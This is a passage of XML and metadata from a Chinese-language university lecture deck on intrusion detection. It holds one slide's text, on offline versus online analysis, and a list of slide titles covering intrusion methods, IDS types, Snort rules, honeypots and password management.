          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的分类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132099" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B06E9FE-D64A-492C-87B0-98282A288EE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>根据时效性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>脱机分析：行为发生后，对产生的数据进行分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>联机分析：在数据产生的同时或者发生改变时进行分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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C:\Utility Tools\Microsoft Office\Templates\Presentation Designs\Blends.pot</Template>
  <TotalTime>2374</TotalTime>
  <Words>14979</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>1509</Paragraphs>
  <Slides>195</Slides>
  <Notes>59</Notes>
  <HiddenSlides>50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195</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="208" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Blends</vt:lpstr>
      <vt:lpstr>图片</vt:lpstr>
      <vt:lpstr>入侵者</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>问题引入</vt:lpstr>
      <vt:lpstr>入侵案例一</vt:lpstr>
      <vt:lpstr>入侵案例二</vt:lpstr>
      <vt:lpstr>1、入侵 (Intrusion)</vt:lpstr>
      <vt:lpstr>2、漏洞</vt:lpstr>
      <vt:lpstr>3、入侵者</vt:lpstr>
      <vt:lpstr>4、入侵系统的主要途径</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>开启一个远程后门并获得命令行的shellcode</vt:lpstr>
      <vt:lpstr>Shellcode编写示例</vt:lpstr>
      <vt:lpstr>Shellcode编写示例</vt:lpstr>
      <vt:lpstr>Shellcode编写示例</vt:lpstr>
      <vt:lpstr>Shellcode编写示例</vt:lpstr>
      <vt:lpstr>确定Shellcode地址</vt:lpstr>
      <vt:lpstr>确定Shellcode地址</vt:lpstr>
      <vt:lpstr>确定Shellcode地址</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>远程入侵的基本方法</vt:lpstr>
      <vt:lpstr>典型网络入侵步骤</vt:lpstr>
      <vt:lpstr>第一步：获取信息</vt:lpstr>
      <vt:lpstr>第一步：获取信息</vt:lpstr>
      <vt:lpstr>第一步：获取信息</vt:lpstr>
      <vt:lpstr>第一步：获取信息</vt:lpstr>
      <vt:lpstr>第一步：获取信息</vt:lpstr>
      <vt:lpstr>第二步：端口扫描</vt:lpstr>
      <vt:lpstr>常见扫描工具</vt:lpstr>
      <vt:lpstr>常见扫描工具</vt:lpstr>
      <vt:lpstr>第三步：漏洞发现与扫描</vt:lpstr>
      <vt:lpstr>扫描器基本模块</vt:lpstr>
      <vt:lpstr>漏洞扫描：CGI漏洞扫描</vt:lpstr>
      <vt:lpstr>CGI漏洞扫描：例子</vt:lpstr>
      <vt:lpstr>Nessus</vt:lpstr>
      <vt:lpstr>Nessus</vt:lpstr>
      <vt:lpstr>Openvas</vt:lpstr>
      <vt:lpstr>Openvas</vt:lpstr>
      <vt:lpstr>Openvas</vt:lpstr>
      <vt:lpstr>Openvas</vt:lpstr>
      <vt:lpstr>第四步：漏洞利用和入侵</vt:lpstr>
      <vt:lpstr>第四步：漏洞利用和入侵</vt:lpstr>
      <vt:lpstr>第四步：漏洞利用和入侵</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>入侵检测的定义</vt:lpstr>
      <vt:lpstr>IDS存在与发展的必然性</vt:lpstr>
      <vt:lpstr>入侵检测的特点</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>入侵检测的起源（1）</vt:lpstr>
      <vt:lpstr>入侵检测的起源（2）</vt:lpstr>
      <vt:lpstr>入侵检测的起源（3）</vt:lpstr>
      <vt:lpstr>入侵检测的起源（4）</vt:lpstr>
      <vt:lpstr>入侵检测的起源（5）</vt:lpstr>
      <vt:lpstr>IDS基本结构</vt:lpstr>
      <vt:lpstr>信息收集</vt:lpstr>
      <vt:lpstr>信息收集</vt:lpstr>
      <vt:lpstr>信息收集的来源</vt:lpstr>
      <vt:lpstr>系统或网络的日志文件</vt:lpstr>
      <vt:lpstr>系统目录和文件的异常变化</vt:lpstr>
      <vt:lpstr>信息分析</vt:lpstr>
      <vt:lpstr>模式匹配</vt:lpstr>
      <vt:lpstr>统计分析</vt:lpstr>
      <vt:lpstr>完整性分析</vt:lpstr>
      <vt:lpstr>入侵检测的分类（1）</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>异常检测</vt:lpstr>
      <vt:lpstr>Anomaly Detection</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>误用检测模型</vt:lpstr>
      <vt:lpstr>Misuse Detection</vt:lpstr>
      <vt:lpstr>入侵检测的分类（2）</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>主机IDS示意图</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>网络IDS示意图</vt:lpstr>
      <vt:lpstr>两类IDS监测软件</vt:lpstr>
      <vt:lpstr>入侵检测的分类（3）</vt:lpstr>
      <vt:lpstr>入侵检测的分类（4）</vt:lpstr>
      <vt:lpstr>常用术语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基于误用的入侵检测</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>基于主机的入侵检测系统</vt:lpstr>
      <vt:lpstr>基于主机的检测威胁</vt:lpstr>
      <vt:lpstr>基于主机的入侵检测系统结构</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>集中式检测的优缺点</vt:lpstr>
      <vt:lpstr>分布式检测的优缺点</vt:lpstr>
      <vt:lpstr>操作模式</vt:lpstr>
      <vt:lpstr>基于主机的技术面临的问题</vt:lpstr>
      <vt:lpstr>基于网络的入侵检测系统</vt:lpstr>
      <vt:lpstr>基于网络的检测威胁</vt:lpstr>
      <vt:lpstr>基于网络的入侵检测系统结构</vt:lpstr>
      <vt:lpstr>传统的基于传感器的结构</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>分布式网络节点结构</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>基于网络的入侵检测的好处</vt:lpstr>
      <vt:lpstr>基于网络的技术面临的问题</vt:lpstr>
      <vt:lpstr>基于异常的入侵检测</vt:lpstr>
      <vt:lpstr>数据选取的原则</vt:lpstr>
      <vt:lpstr>NIDS抓包</vt:lpstr>
      <vt:lpstr>分析数据包</vt:lpstr>
      <vt:lpstr>模式匹配</vt:lpstr>
      <vt:lpstr>协议分析</vt:lpstr>
      <vt:lpstr>一个攻击检测实例</vt:lpstr>
      <vt:lpstr>简单的匹配</vt:lpstr>
      <vt:lpstr>检查端口号</vt:lpstr>
      <vt:lpstr>深入决策树</vt:lpstr>
      <vt:lpstr>Snort：实用网络入侵检测工具</vt:lpstr>
      <vt:lpstr>Snort：组成部分</vt:lpstr>
      <vt:lpstr>Snort：工作模式</vt:lpstr>
      <vt:lpstr>Snort：工作模式</vt:lpstr>
      <vt:lpstr>Snort：工作模式</vt:lpstr>
      <vt:lpstr>Snort：配置文件</vt:lpstr>
      <vt:lpstr>Snort：rules文件</vt:lpstr>
      <vt:lpstr>Snort规则（1）</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Snort规则（2）</vt:lpstr>
      <vt:lpstr>Snort规则（3）</vt:lpstr>
      <vt:lpstr>Snort规则（4）</vt:lpstr>
      <vt:lpstr>Snort规则（5）</vt:lpstr>
      <vt:lpstr>Snort规则（6）</vt:lpstr>
      <vt:lpstr>Snort规则（7）</vt:lpstr>
      <vt:lpstr>Snort规则（8）</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>响应策略</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>蜜罐: 诱骗服务</vt:lpstr>
      <vt:lpstr>蜜罐: 弱化系统</vt:lpstr>
      <vt:lpstr>蜜罐: 强化系统</vt:lpstr>
      <vt:lpstr>蜜罐: 用户模式服务器</vt:lpstr>
      <vt:lpstr>蜜罐: 用户模式服务器</vt:lpstr>
      <vt:lpstr>蜜罐: 实用系统</vt:lpstr>
      <vt:lpstr>蜜罐: 实用系统</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>CIDF (The Common Intrusion Detection Framework)</vt:lpstr>
      <vt:lpstr>CIDF模型（1）</vt:lpstr>
      <vt:lpstr>CIDF模型（2）</vt:lpstr>
      <vt:lpstr>CIDF模型－事件产生器（1）</vt:lpstr>
      <vt:lpstr>CIDF模型－事件产生器（2）</vt:lpstr>
      <vt:lpstr>CIDF模型－事件分析器</vt:lpstr>
      <vt:lpstr>CIDF模型－响应单元</vt:lpstr>
      <vt:lpstr>CIDF模型－事件数据库</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>口令管理</vt:lpstr>
      <vt:lpstr>攻击策略和对策</vt:lpstr>
      <vt:lpstr>攻击策略和对策 Attack strategies and countermeasures</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Unix实现</vt:lpstr>
      <vt:lpstr>用户口令选择</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>口令选择策略 </vt:lpstr>
      <vt:lpstr>Bloom过滤器</vt:lpstr>
      <vt:lpstr>原理说明</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Peking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入侵检测技术</dc:title>
  <dc:creator>smilerain</dc:creator>
  <cp:lastModifiedBy>He Gaofeng</cp:lastModifiedBy>
  <cp:revision>502</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-12-17T21:45:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-09T00:47:41Z</dcterms:modified>
</cp:coreProperties>
</file>